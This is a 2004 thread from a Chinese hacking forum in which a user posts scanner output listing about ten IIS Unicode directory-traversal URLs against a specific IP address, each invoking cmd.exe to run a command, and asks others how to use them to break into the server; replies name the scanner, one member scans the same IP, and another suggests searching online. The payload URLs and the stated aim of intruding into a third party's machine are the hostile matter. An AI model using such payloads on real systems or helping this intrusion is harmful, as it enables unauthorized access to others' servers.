黑色海岸线论坛 - Powered by Discuz! Board

标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？ [打印本页]

作者: 冰辰 时间: 2004-9-23 13:09 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://218.85.133.198/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
以上是我扫的一个服务器~我不知道~怎么样用IIS入侵~
请老大~大姐~帮我分析！~~

作者: 痴心的鱼 时间: 2004-9-23 14:21 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

大哥是不是用X-SCAN扫描的啊

作者: 飛鳥 时间: 2004-9-23 22:33 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

uncode呀~~~
是不是我起步太晚了，还没遇见过呢~~

作者: 冰辰 时间: 2004-9-24 12:53 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

是什么啊~我问你们呢~~~要怎么解决啊~
是用X-SCAN扫的~
uncode 着是什么意思~~~~上面的~

作者: 一只蛐蛐 时间: 2004-9-24 16:47 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

飞鸟。这个不是U漏洞。
是“IIS.asp映射分块编码远程缓冲区溢出漏洞”。
漏洞名字已经说清了。自己查阅相关资料。。
如果懒的动手我也没办法

作者: 冰辰 时间: 2004-9-24 16:56 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

不是懒动手~~~
是不知道怎么查

作者: 一只蛐蛐 时间: 2004-9-24 17:40 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

我帮你扫了一下这个IP
不存在IIS漏洞。存在WEBDAV。不过我没测试。

作者: 冰辰 时间: 2004-9-24 21:26 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

不是的啊~~~~还有好多和上面的内容~~
太多~我没放上来啊~
它还开了3389~~~~
着难道不是IIS的漏洞么~~~~
请上面楼的大哥说清楚~~~
我不是懒`~~是不知道怎么做~~
谢决~~

作者: 飛鳥 时间: 2004-9-24 22:01 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

下面引用由一只蛐蛐在 2004/09/24 04:47pm 发表的内容：
飞鸟。这个不是U漏洞。
是“IIS.asp映射分块编码远程缓冲区溢出漏洞”。
漏洞名字已经说清了。自己查阅相关资料。。
如果懒的动手我也没办法

是这样的吗？
现在懂了~~~汗~~真丢人

作者: 冰辰 时间: 2004-9-25 12:47 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

真的是很郁闷啊~~~~~~~~~~~~~``
还是不懂~

作者: copyday 时间: 2004-12-8 11:04 标题: 关于IIS漏洞~~~~~帮我分析一下可以么~？

我昏``用google 搜下不就知道了

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)